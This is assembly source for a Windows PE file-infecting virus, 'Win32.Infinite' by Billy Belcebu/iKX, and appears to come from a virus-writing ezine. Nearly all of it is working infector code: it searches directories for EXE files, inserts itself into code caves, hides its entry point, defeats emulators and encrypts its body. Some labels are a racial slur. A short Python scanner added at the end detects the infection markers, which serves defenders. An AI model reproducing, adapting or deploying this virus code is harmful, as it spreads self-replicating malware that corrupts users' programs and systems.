lea edi ,[ ebp+infect_dir - delta ]push 7Fhpush ediapicall GetSystemDirectoryAcall SetDir &Infect

lea edi ,[ ebp+current_dir - delta ]push ediapicall SetCurrentDirectoryAcall Seek&Infect

; Now let's unprotect the memory where the epo byte s will be restored

call hh&l ; Hunting high & low :)dq ?

hh&l : push 04h ; PAGE_READWRITEpush epo_bytesmov eax ,dword ptr [ ebp+rethost - delta ]add eax ,dword ptr [ ebp+modbase- delta ]push eaxapicall VirtualProtect

; Now it's time to go away ;)

RestoreSEH :xor edx , edx ; Restore the original SEHpop dword ptr fs :[ edx ]pop edx

mov edi ,( offset host - 400000h )rethost equ $- 4

add edi , 12345678hmodbase equ $- 4

mov [ esp.20h ], edi

call over0sebes db epo_bytes dup ( 90h )over0 : pop esi

push epo_bytespop ecxrep movsb

popadret

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Mark of the virus º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

db 0, "Win32.Infinite (c) 2000 Billy Belcebu/iKX" , 0

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Search for files to infect º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

SetDir &Infect :lea edi ,dword ptr [ ebp+infect_dir - delta ]push ediapicall SetCurrentDirectoryA

Seek&Infect :lea eax ,[ ebp+WFD- delta ] ; Search for filespush eaxcall over3db "*.*" , 0 ; Search for all files

over3 : apicall FindFirstFileA

mov dword ptr [ ebp+SearchHandle - delta ], eax

inc eaxjz FailOccured

SearchForMore :push dword ptr [ ebp+modbase- delta ] ; Preserve untouchable infopush dword ptr [ ebp+rethost - delta ]

lea edi ,[( ebp.WFD.szFileName )- delta ] ; Is the file found factiblepush edi ; of being infected?call ProcessExtensionpop edijecxz NotThisTime ; Nopes.

call InfectPE

NotThisTime :pop dword ptr [ ebp+rethost - delta ] ; Restore this interesting pop dword ptr [ ebp+modbase- delta ] ; info

lea edi ,[( ebp.WFD.szFileName )- delta ] ; Fill this with zeroesmov ecx , 260

xor al , alrep stosb

lea eax ,[ ebp.WFD- delta ] ; Search for more little push eax ; suckerspush dword ptr [ ebp+SearchHandle - delta ]

apicall FindNextFileAor eax , eaxjnz SearchForMore

CloseSearchHandle :push dword ptr [ ebp+SearchHandle - delta ]apicall FindClose

FailOccured :ret

ProcessExtension :; input:; EDI - Pointer to file name; output:; ECX - NULL if it is not an extension; 1 if it is.

xor al , al ; Search for NULLscasbjnz $- 1

lea esi ,[ edi - 5] ; Get the extension :)push 05h ; Size to calculate CRC32pop edior dword ptr [ esi ], 20202020h ; Make locase the lewserscall CRC32

cmp eax , 0F643C743h ; Only EXE filesjz ItWasExtension

dec edxItWasExtension :

inc edxmov ecx , edxret

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º PE Infection Engine º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

InfectPE :; input:; EDI - Pointer to filename to infect; output:; Nothing.

cmp dword ptr [ ebp+SfcIsFileProtected - delta ], 00hjz NotInWin2k

push edi ; Win2k ability: it has featurepush 00h ; that warns the user if an apicall SfcIsFileProtected ; important file is being

; modified. If the file has or eax , eax ; such protection, we won't jnz ExitInfectPE ; touch it, ok? ;)

NotInWin2k :push 80h ; Destroy hostile attributespush edi ; and put normal ones apicall SetFileAttributesA

xor eax , eax ; Open file for R/Wpush eaxpush eax

push 03h ; OPEN_EXISTING flagpush eaxinc eaxpush eax

push 0C0000000h ; READ / WRITEpush ediapicall CreateFileA

inc eaxjz ExitInfectPEdec eax

mov dword ptr [ ebp+FileHandle - delta ], eax; Save handle of opened file

push eax

push 00hpush eaxapicall GetFileSize ; Get its sizemov dword ptr [ ebp+OriginalSize - delta ], eax

pop ecx ; ECX = Handle

xor ebx , ebx ; EBX = 0push ebxpush 00h ; push sizepush ebxpush 04hpush ebxpush ecx ; push handleapicall CreateFileMappingA

or eax , eaxjz CloseFileExitInfectPE

mov dword ptr [ ebp+MapHandle - delta ], eax

xor ebx , ebxpush 00h ; We want map only file size push ebxpush ebxpush 02hpush eaxapicall MapViewOfFile

or eax , eaxjz UnMap&CloseMap &FileExitInfectPE

mov dword ptr [ ebp+MapAddress - delta ], eax

mov esi ,[ eax +3Ch] ; Ptr to PE header =]add esi , eaxmov dword ptr [ ebp+PtrPEH - delta ], esi

cmp word ptr [ esi ], "EP" ; Check for PE markjnz Trunc &UnMap&CloseMap &FileExitInfectPE

cmp dword ptr [ esi.MagicInfection ], inf_markjz Trunc &UnMap&CloseMap &FileExitInfectPE ; Check for previous infection

cmp word ptr [ esi.Machine ], 014Chjnz Trunc &UnMap&CloseMap &FileExitInfectPE ; Check for i386 ;)

        cmp     dword ptr [ebp.WFD.nFileSizeHigh-delta], 00h
        jne     Trunc&UnMap&CloseMap&FileExitInfectPE   ; Don't allow huge & ugly files

        cmp     dword ptr [ebp.WFD.nFileSizeLow-delta], 4000h
        jb      Trunc&UnMap&CloseMap&FileExitInfectPE   ; Don't allow too little files

        mov     eax, [esi.EntrypointRVA]        ; EAX = Old file's EIP
        mov     dword ptr [ebp+rethost-delta], eax

        mov     edi, esi
        add     esi, 0F8h-28h           ; Pointer to 1st section-28h

nigger: add     esi, 28h                ; Ptr to section name ;)
        mov     edx, eax                ; Put in EDX the original EIP
        sub     edx, [esi.VirtualAddress]       ; Remove the VirtualAddress
        cmp     edx, [esi.VirtualSize]  ; Is EIP pointing to this sec?
        jae     nigger                  ; If not, loop again

        mov     ebx, dword ptr [ebp+MapAddress-delta]

        pushad
        push    dword ptr [esi.SizeOfRawData]   ; Some tricky thing :)
        pop     dword ptr [esi.VirtualSize]
        mov     eax, [ebp+rethost-delta]
        add     eax, ebx
        mov     dword ptr [ebp+tempshit-delta], eax
        popad

        add     ebx, [esi.PtrToRawData]
        add     edx, ebx
        mov     esi, edx                ; ESI - Pointer to section
        mov     dword ptr [ebp+EPofs-delta], esi        ; mapped in mem where da EP is.

        mov     ebx, dword ptr [ebp+OriginalSize-delta] ; Search limit
        mov     ecx, heap_end-virus_start+security      ; How many space do we need
        call    SeekForHoles
        jc      ThereWasNoHole

        pushad
        sub     eax, dword ptr [ebp+MapAddress-delta]
        mov     esi, dword ptr [ebp+PtrPEH-delta]
        mov     edi, esi                ; We wanna put some attribs
        add     esi, 0F8h-28h           ; to the section where the

niggr2: add     esi, 28h                ; virus code is located, so
        mov     edx, eax                ; we've to search for it :)
        sub     edx, [esi.VirtualAddress]
        cmp     edx, [esi.VirtualSize]
        jae     niggr2

        ; EAX = Ptr to hole

        mov     dword ptr [ebp+inf_switch-delta], 00h

        ; Let's check if we can put ourselves inside the hole (more security)

        mov     edx, [esi.VirtualAddress]
        add     edx, [esi.VirtualSize]
        add     eax, ((heap_end-virus_start)+security)
        sub     edx, eax
        js      wecantinfectthere
        mov     dword ptr [ebp+inf_switch-delta], 01h
        or      [esi.Characteristics], 0A0000020h       ; PUT IT SUCKA!

wecantinfectthere:
        popad


        mov     ecx, 12345678h
        org     $-4

inf_switch dd ?
        or      ecx, ecx
        jz      Trunc&UnMap&CloseMap&FileExitInfectPE

        lea     esi, [ebp+virus_start-delta]
        mov     edi, eax
        add     edi, security           ; Some security :)

        pushad
        mov     eax, 12345678h          ; Let's calculate where the

tempshit = $-4                          ; jmp must point to
        add     eax, (killemu-epo)
        sub     edi, eax
        mov     dword ptr [ebp+jmpadd-delta], edi
        popad

        mov     ecx, virus_size
        rep     movsb

        ; Encrypt with a silly l00p

        pushad
        sub     edi, virus_end-encrypt_start
        mov     esi, edi
        call    random
        mov     bl, al
        mov     byte ptr [edi+enc_key-encrypt_start], bl
        mov     byte ptr [ebp+enc_k3y-delta], bl
        mov     ecx, encrypt_end-encrypt_start

enc_l00p:
        lodsb
        xor     al, bl
        stosb
        loop    enc_l00p
        popad

        pushad
        sub     edi, (virus_size-(sebes-virus_start))
        mov     esi, dword ptr [ebp+EPofs-delta]
        push    epo_bytes
        pop     ecx
        pushad

lewpit: lodsb                           ; Store EPO bytes also
        xor     al, 00h                 ; encrypted

enc_k3y = $-1
        stosb
        loop    lewpit

        popad
        xchg    edi, esi

        call    over69

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
epo:    call    killemu                 ;³ This code will give the control to the

        mov     esp, [esp+08h]          ;³ virus and avoid the scanning of emulators
        xor     edx, edx                ;³ at the same time :)
        pop     dword ptr fs:[edx]      ;³


        pop     edx                     ;³
        db      0E9h                    ;³

jmpadd: dd      ?                       ;³
killemu: xor    edx, edx                ;³

        push    dword ptr fs:[edx]      ;³
        mov     fs:[edx], esp           ;³
        div     edx                     ;³

epo_bytes = $-epo                       ;³
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

over69: pop     esi

        rep     movsb
        popad

        mov     esi, dword ptr [ebp+PtrPEH-delta]
        mov     dword ptr [esi.MagicInfection], inf_mark        ; Put inf. mark

        ; Fix checksum if needed

        add     esi, 58h
        cmp     dword ptr [esi], 00h
        jz      Trunc&UnMap&CloseMap&FileExitInfectPE

        push    esi                     ; Pointer to CheckSum field
        call    n4t4s
        dd      ?                       ; Where store old CheckSum

n4t4s:  push    dword ptr [ebp+OriginalSize-delta]
        push    dword ptr [ebp+MapAddress-delta]
        apicall CheckSumMappedFile

ThereWasNoHole:
Trunc&UnMap&CloseMap&FileExitInfectPE:
UnMap&CloseMap&FileExitInfectPE:

        push    dword ptr [ebp+MapAddress-delta]
        apicall UnmapViewOfFile

CloseMap&FileExitInfectPE:
        push    dword ptr [ebp+MapHandle-delta]
        apicall CloseHandle

CloseFileExitInfectPE:
        push    dword ptr [ebp+FileHandle-delta]
        apicall CloseHandle

ExitInfectPE:
        ret

SeekForHoles:
; input:
;   ESI - Pointer inside file (in PE header)
;   ECX - How many space do we need
;   EBX - Search limit
; output:
;   EAX - Pointer to the beginning of the shit
;   CF  - Set if error (couldn't find hole)

        call    SetSEH1
        mov     esp, [esp+08h]          ; Just for security of
        call    get_delta               ; scanning :)
        jmp     NSE_

SetSEH1:
        xor     edx, edx


        push    dword ptr fs:[edx]
        mov     dword ptr fs:[edx], esp

        push    esi
GetAnotherByte:

        xor     edx, edx                ; Clear counter :)
GAB2:   dec     ebx                     ; Check if we arrived until

        jz      NoShitEnough            ; the limit (run away if so)
        lodsb
        or      al, al                  ; NULL byte?
        jz      IsFillByte
        cmp     al, 0CCh                ; Int 3? (VC6 filez're full
        jnz     GetAnotherByte          ; of them)

IsFillByte:
        inc     edx                     ; Increase counter
        cmp     ecx, edx
        jnz     GAB2

WeFoundManyShit:
        sub     esi, ecx                ; ESI = Point to shit
        xchg    eax, esi
        pop     esi
        pop     dword ptr fs:[00h]
        pop     edx
        ret

NoShitEnough:
        pop     esi

NSE_:   stc
        pop     dword ptr fs:[00h]
        pop     edx
        ret

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º                         APICRC32 Search Engine                         º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼

GetAPIs proc
; input:
;   EAX - Base address of the library where search the APIs
;   ESI - Pointer to an array of CRC32 of the APIs we want to search
;   EDI - Pointer to where store the APIs
; output:
;   Nothing.

        push    eax                     ; EAX = Handle of module
        pop     dword ptr [ebp+TmpModuleBase-delta]

APIS33K:
        lodsd                           ; Get in EAX the CRC32 of API

        push    esi edi
        call    GetAPI_ET_CRC32

        pop     edi esi
        stosd                           ; Save in [EDI] the API address

        cmp     byte ptr [esi], 0BBh    ; There are more APIs in this
        jnz     APIS33K                 ; library

        inc     esi                     ; Check if it's the last of
        cmp     byte ptr [esi], " DC4"  ; all them
        jz      EndOfAPISearch

        push    esi                     ; ESI points now to the ASCIIz
        apicall LoadLibraryA            ; string of a library... We

                                        ; need to load it!
        push    eax


nxtchr: lodsb                           ; Reach the end of the lib
        test    al, al                  ; asciiz name
        jnz     nxtchr

        pop     eax
        jmp     GetAPIs

EndOfAPISearch:
        ret

GetAPIs endp

GetAPI_ET_CRC32 proc
; input:
;   EAX - CRC32 of the API we want to know its address
; output:
;   EAX - API address, NULL if error

        xor     edx, edx

        pushad

        call    over_APICRC32_SEH
        mov     esp, [esp+08h]          ; Set stack as before
        xor     eax, eax                ; signalize the error
        jmp     Remove_APICRC32_SEH

over_APICRC32_SEH:
        push    dword ptr fs:[edx]      ; Set new SEH frame
        mov     dword ptr fs:[edx], esp

        xchg    eax, edx                ; Put CRC32 of da api in EDX
        mov     dword ptr [ebp+Counter-delta], eax      ; Clear this field :)
        push    3Ch
        pop     esi
        add     esi, [ebp+TmpModuleBase-delta]  ; Get PE header of module

        lodsw
        add     eax, [ebp+TmpModuleBase-delta]  ; Normalize

        push    1Ch
        pop     esi
        add     esi, [eax+78h]          ; Get a pointer to its edata
        add     esi, [ebp+TmpModuleBase-delta]

        lea     edi, [ebp+AddressTableVA-delta] ; Pointer to the address table
        lodsd                           ; Get AddressTable value

        add     eax, [ebp+TmpModuleBase-delta]  ; Normalize
        stosd                           ; And store in its variable

        lodsd                           ; Get NameTable value
        add     eax, [ebp+TmpModuleBase-delta]  ; Normalize

        push    eax                     ; Put it in stack
        stosd                           ; Store in its variable

        lodsd                           ; Get OrdinalTable value
        add     eax, [ebp+TmpModuleBase-delta]  ; Normalize

        stosd                           ; Store

        pop     esi                     ; ESI = NameTable VA

@?_3:   lodsd                           ; Get pointer to an API name
        push    esi                     ; Save again
        add     eax, [ebp+TmpModuleBase-delta]  ; Normalize


        xchg    edi, eax                ; Store ptr in EDI
        mov     ebx, edi                ; And in EBX

        push    edi                     ; Save EDI
        xor     al, al
        scasb
        jnz     $-1

        pop     esi                     ; ESI = Pointer to API Name

        sub     edi, ebx                ; EDI = API Name size

        push    edx                     ; Save API's CRC32
        call    CRC32                   ; Get actual api's CRC32
        pop     edx                     ; Restore API's CRC32
        cmp     edx, eax                ; Are them equal?
        jz      @?_4                    ; if yes, we got it

        pop     esi                     ; Restore ptr to api name
        inc     dword ptr [ebp+Counter-delta]   ; And increase the counter

        jmp     @?_3                    ; Get another api!
@?_4:

        pop     esi                     ; Remove shit from stack
        mov     eax, 12345678h          ; Put in EAX the number that

Counter = $-4                           ; the API occupy in list.
        shl     eax, 1                  ; *2 (it's an array of words)

        add     eax, [ebp+OrdinalTableVA-delta] ; Normalize
        xchg    eax, esi                ; ESI = Ptr 2 ordinal; EAX = 0
        lodsw                           ; Get ordinal in AX
        cwde                            ; Clear MSW of EAX
        shl     eax, 2                  ; And with it we go to the

        add     eax, [ebp+AddressTableVA-delta] ; AddressTable (array of
        xchg    esi, eax                ; dwords)
        lodsd                           ; Get Address of API RVA

        add     eax, [ebp+TmpModuleBase-delta]  ; and normalize!! That's it!

Remove_APICRC32_SEH:
        xor     edx, edx                ; Remove that SEH frame
        pop     dword ptr fs:[edx]
        pop     edx
        mov     [esp.1Ch], eax
        popad

        ret
GetAPI_ET_CRC32 endp

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º                              Subroutines                               º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼

CRC32:
; input:
;   ESI - Pointer to the data to process
;   EDI - Size of such data
; output:
;   EAX - CRC32 of that data

        cld
        pushad
        xor     ecx, ecx                ; Optimized by me - 2 bytes

        dec     ecx                     ; less
        mov     edx, ecx

NextByteCRC:
        xor     eax, eax
        xor     ebx, ebx


        lodsb
        xor     al, cl
        mov     cl, ch
        mov     ch, dl
        mov     dl, dh
        mov     dh, 8

NextBitCRC:
        shr     bx, 1
        rcr     ax, 1
        jnc     NoCRC
        xor     ax, 08320h
        xor     bx, 0EDB8h

NoCRC:  dec     dh
        jnz     NextBitCRC
        xor     ecx, eax
        xor     edx, ebx

        dec     edi
        jnz     NextByteCRC
        not     edx
        not     ecx

        xchg    eax, edx
        rol     eax, 10h

        mov     ax, cx
        mov     [esp.PUSHAD_EAX], eax
        popad

        ret

CheckImageBase:
; input:
;   ESI - Address inside module
;   ECX - Limit
; output:
;   ESI - module address

        and     esi, 0FFFF0000h
        cmp     word ptr [esi], "ZM"
        jz      ItWasKewlEnough

NotCoolAddress:
        sub     esi, 00010000h
        loop    CheckImageBase

ItWasKewlEnough:
        ret

random:
; input:
;   Nothing.
; output:
;   EAX - Random number

        apicall GetTickCount
        xor     eax, 12345678h
        org     $-4

seed    dd      -1
        mov     dword ptr [ebp+seed-delta], eax
        ret

; Let's save some bytes ;)

get_delta:
        call    delta                   ; Get a relative address from

delta:  pop     ebp                     ; when calculate offsets
        ret


; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º                               Virus Data                               º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼

api_list = $
;       db      "KERNEL32",0            ; Don't needed

@VirtualProtect         dd      079C3D4BBh
@FindFirstFileA         dd      0AE17EBEFh
@FindNextFileA          dd      0AA700106h
@FindClose              dd      0C200BE21h
@CreateFileA            dd      08C892DDFh
@SetFileAttributesA     dd      03C19E536h
@CloseHandle            dd      068624A9Dh
@GetCurrentDirectoryA   dd      0EBC6C18Bh
@SetCurrentDirectoryA   dd      0B2DBD7DCh
@GetWindowsDirectoryA   dd      0FE248274h
@GetSystemDirectoryA    dd      0593AE7CEh
@CreateFileMappingA     dd      096B2D96Ch
@MapViewOfFile          dd      0797B49ECh
@UnmapViewOfFile        dd      094524B42h
@SetEndOfFile           dd      059994ED6h
@GetFileSize            dd      0EF7D811Bh
@SetFilePointer         dd      085859D42h
@GetSystemTime          dd      075B7EBE8h
@LoadLibraryA           dd      04134D1ADh
@FreeLibrary            dd      0AFDF191Fh
@GlobalAlloc            dd      083A353C3h
@GlobalFree             dd      05CDF6B6Ah
@WriteFile              dd      021777793h
@GetProcAddress         dd      0FFC97C1Fh
@GetTickCount           dd      0613FD7BAh

        db      0BBh

        db      "IMAGEHLP", 0
@CheckSumMappedFile     dd      078B31744h

        db      0BBh

        db      "SFC", 0
@SfcIsFileProtected     dd      06DE8F7ABh

        db      0BBh

; That's the end, my friend...

        db      " DC4"

encrypt_end = $

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º                        Simple decryption l00p :)                       º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼

decrypt:
        pop     esi
        mov     edi, esi
        mov     ecx, encrypt_end-encrypt_start
        mov     bl, 00h

enc_key = $-1
dec_l00p:

        lodsb
        xor     al, bl
        stosb
        loop    dec_l00p
        jmp     encrypt_start


virus_end = $

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º                         Virus Data in the heap                         º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼

kernel          dd      ?
TmpModuleBase   dd      ?
AddressTableVA  dd      ?
NameTableVA     dd      ?
OrdinalTableVA  dd      ?
OriginalSize    dd      ?
SearchHandle    dd      ?
FileHandle      dd      ?
MapHandle       dd      ?
MapAddress      dd      ?
PtrPEH          dd      ?
EPofs           dd      ?

api_addresses = $

; KERNEL32 APIs

VirtualProtect          dd      ?
FindFirstFileA          dd      ?
FindNextFileA           dd      ?
FindClose               dd      ?
CreateFileA             dd      ?
SetFileAttributesA      dd      ?
CloseHandle             dd      ?
GetCurrentDirectoryA    dd      ?
SetCurrentDirectoryA    dd      ?
GetWindowsDirectoryA    dd      ?
GetSystemDirectoryA     dd      ?
CreateFileMappingA      dd      ?
MapViewOfFile           dd      ?
UnmapViewOfFile         dd      ?
SetEndOfFile            dd      ?
GetFileSize             dd      ?
SetFilePointer          dd      ?
GetSystemTime           dd      ?
LoadLibraryA            dd      ?
FreeLibrary             dd      ?
GlobalAlloc             dd      ?
GlobalFree              dd      ?
WriteFile               dd      ?
GetProcAddress          dd      ?
GetTickCount            dd      ?

; IMAGEHLP APIs

CheckSumMappedFile      dd      ?

; SFC APIs

SfcIsFileProtected      dd      ?

; Other data

WFD             WIN32_FIND_DATA <?>
infect_dir      db      7Fh dup (?)
current_dir     db      7Fh dup (?)


heap_end = $

virseg ends

end infinite

;------------------------------[ INFINITE.INC ]------------------------------;

;****************************************************************************
;**      This is the include file for the constant and macros of the virus **
;****************************************************************************

; Constants

virus_size      = virus_end-virus_start
total_size      = heap_end-virus_start
inf_mark        = "AIAG"

security        = 20d                   ; Very important

PUSHAD_EDI      = 00h
PUSHAD_ESI      = 04h
PUSHAD_EBP      = 08h
PUSHAD_ESP      = 0Ch
PUSHAD_EBX      = 10h
PUSHAD_EDX      = 14h
PUSHAD_ECX      = 18h
PUSHAD_EAX      = 1Ch

; Some PE header stuff

MagicPE         = 00h
Machine         = 04h
NumberOfSections = 06h
EntrypointRVA   = 28h
CodeRVA         = 2Ch
FileAlignment   = 3Ch
MagicInfection  = 4Ch
SizeOfImage     = 50h
CheckSum        = 58h
PECharacteristics = 5Eh
DirEntryReloc   = 0A0h

; Some section header fields

SectionName     = 00h
VirtualSize     = 08h
VirtualAddress  = 0Ch
SizeOfRawData   = 10h
PtrToRawData    = 14h
PtrToReloc      = 18h
NumOfReloc      = 20h
Characteristics = 24h

; Macros

apicall macro   api2call
        call    dword ptr [ebp+api2call-delta]
endm

; Structures


WIN32_FIND_DATA struc
dwFileAttributes        dd      ?
ftCreationTime          dq      ?
ftLastAccessTime        dq      ?
ftLastWriteTime         dq      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?
dwReserved0             dd      ?
dwReserved1             dd      ?
szFileName              db      260 dup (?)
szAlternateFileName     db      13 dup (?)

                        db      03 dup (?)
WIN32_FIND_DATA ends

;-------------------------------[ HOST.INC ]--------------------------------;

;****************************************************************************
;**               This is the host for the first generation                **
;****************************************************************************

.586p

.model flat,stdcall

extrn   MessageBoxA:PROC
extrn   ExitProcess:PROC

_DATA segment dword use32 public 'DATA'

szTtl   db      "Win32.Infinite", 0
szMsg   db      "Size "

        db      virus_size/1000 mod 10 + "0"
        db      virus_size/0100 mod 10 + "0"
        db      virus_size/0010 mod 10 + "0"
        db      virus_size/0001 mod 10 + "0"
        db      " - "
        db      "Virtual "
        db      total_size/1000 mod 10 + "0"
        db      total_size/0100 mod 10 + "0"
        db      total_size/0010 mod 10 + "0"
        db      total_size/0001 mod 10 + "0"
        db      10, "(c) 2000 Billy Belcebu/iKX", 0

_DATA ends

_TEXT segment dword use32 public 'CODE'

virus_init proc
        jmp     virus_start

host:
        db      epo_bytes dup (90h)
        call    MessageBoxA, 0, offset szMsg, offset szTtl, 0
        call    ExitProcess, 0

virus_init endp

_TEXT ends
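Added here as a defender's check, not code from either listing in this ezine: a small Python scanner for the infection marks these sources leave in a PE file. Both Win32.Infinite (the source above) and W9x.mATRiX (the source that follows) stamp the reserved dword at PE header offset 4Ch (inf_mark "AIAG" and 0badc0deh respectively) and OR 0A0000020h into the section they patch; the sample PE headers below are constructed inline so the script runs offline.

```python
import struct

# Markers written at PE+4Ch (the reserved Win32VersionValue field) by the two
# viruses on this page; values are taken from their listings.
INFINITE_MARK = b"AIAG"          # Win32.Infinite: inf_mark = "AIAG"
MATRIX_MARK = 0x0BADC0DE         # W9x.mATRiX:     mov eax, 0badc0deh
# IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE: the
# Characteristics both viruses OR into the patched section (0A0000020h).
RWX_CODE = 0xA0000020


def scan_pe(data: bytes) -> dict:
    """Return {'machine', 'marker', 'rwx_sections'} for one PE image in memory."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec = struct.unpack_from("<HH", data, pe + 4)
    opt_size = struct.unpack_from("<H", data, pe + 0x14)[0]
    reserved = data[pe + 0x4C:pe + 0x50]                      # PE+4Ch
    if len(reserved) != 4:
        raise ValueError("truncated optional header")

    marker = None
    if reserved == INFINITE_MARK:
        marker = "Win32.Infinite"
    elif struct.unpack("<I", reserved)[0] == MATRIX_MARK:
        marker = "W9x.mATRiX"

    # Section table follows the optional header: 28h bytes per entry, with
    # Characteristics at +24h, matching the offsets the listings define.
    rwx = []
    table = pe + 0x18 + opt_size
    for i in range(nsec):
        off = table + i * 0x28
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        chars = struct.unpack_from("<I", data, off + 0x24)[0]
        if chars & RWX_CODE == RWX_CODE:
            rwx.append(name)
    return {"machine": machine, "marker": marker, "rwx_sections": rwx}


def build_sample(reserved: bytes, section_flags: int) -> bytes:
    """Constructed minimal PE (headers only, one section) to exercise scan_pe."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # PE header at 40h
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    opt[0x34:0x38] = reserved                                 # optional+34h == PE+4Ch
    sec = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x1000, 0x1000, 0x1000, 0x400, 0, 0, 0, 0, section_flags)
    return bytes(dos) + coff + bytes(opt) + sec


if __name__ == "__main__":
    samples = [
        ("clean", build_sample(b"\0\0\0\0", 0x60000020)),
        ("infinite", build_sample(INFINITE_MARK, RWX_CODE)),
        ("matrix", build_sample(struct.pack("<I", MATRIX_MARK), RWX_CODE)),
    ]
    for label, image in samples:
        print(label, scan_pe(image))
```

A writable code section is also produced by some packers and runtimes, so treat the RWX flags as a hint and the 4Ch marker as the strong indicator.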


;comment ÿ
;
;released
;
